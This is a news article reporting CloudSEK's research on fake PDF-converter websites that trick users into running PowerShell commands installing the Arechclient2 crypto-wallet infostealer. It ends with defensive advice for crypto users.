- Cybercriminals have deployed fake PDF converters that secretly install malware designed to steal crypto wallet data
- The malware, Arechclient2, extracts browser credentials and targets digital asset holders by harvesting wallet information
- Cybersecurity firm CloudSEK has linked the operation to a broader trend of cyberattacks exploiting the crypto ecosystem’s growing user base
A new malware campaign is using bogus PDF-to-DOCX converters to infiltrate users’ systems and drain their crypto wallets. Cybersecurity firm CloudSEK reports that attackers have mimicked the popular PDFCandy.com website to distribute Arechclient2, a stealthy malware variant that steals browser credentials and cryptocurrency wallet data. The campaign reveals how crypto holders are increasingly being targeted through highly convincing social engineering.
Converting Your Crypto into Their Wallets
The Federal Bureau of Investigation warned last month that agents in its Denver Field Office were increasingly seeing a scam involving free online document converter tools, leading to CloudSEK taking a closer look. It found that the fraudulent domains — including candyxpdf[.]com and candyconverterpdf[.]com — imitate legitimate document conversion platforms, but unlike real converters, they instruct users to run suspicious PowerShell commands that install Arechclient2, an infostealer previously used in crypto-related attacks.
Once installed, the malware extracts autofill data, stored browser credentials, and wallet access details — crucial entry points into crypto holdings. The attackers appear to be focusing not just on individual users, but also those interacting with decentralized finance (DeFi) platforms and browser-based wallets like MetaMask.
“Threat actors are now blending technical deception with financial motivation,” CloudSEK noted in its analysis, pointing out the focus on high-value targets like cryptocurrency investors.
Weaponizing Convenience
By replicating a seemingly harmless file conversion tool, attackers are exploiting a fundamental human weakness: trust in routine services. The fake converters mimic a full user experience, complete with upload progress bars and CAPTCHA challenges, to avoid raising suspicion. Once users input the PowerShell command — under the guise of completing the conversion — their systems become compromised.
The development is part of a wider trend where fake software utilities, especially ones advertised via SEO manipulation or email phishing, have become an increasingly common attack vector in crypto-focused cybercrime.
Survival in the Crypto World Becoming Harder
As digital assets attract both institutional and individual investors, the risk of malware attacks targeting wallet credentials is escalating. CloudSEK’s findings highlight the need for crypto users to rely exclusively on vetted tools and platforms, avoid running any script-based instructions from unknown sources, and adopt strong endpoint protection.
“Malware like Arechclient2 shows that the line between common web activity and financial theft has never been thinner,” CloudSEK warns. Users are urged to double-check URLs, disable PowerShell access if unused, and use hardware wallets where possible.
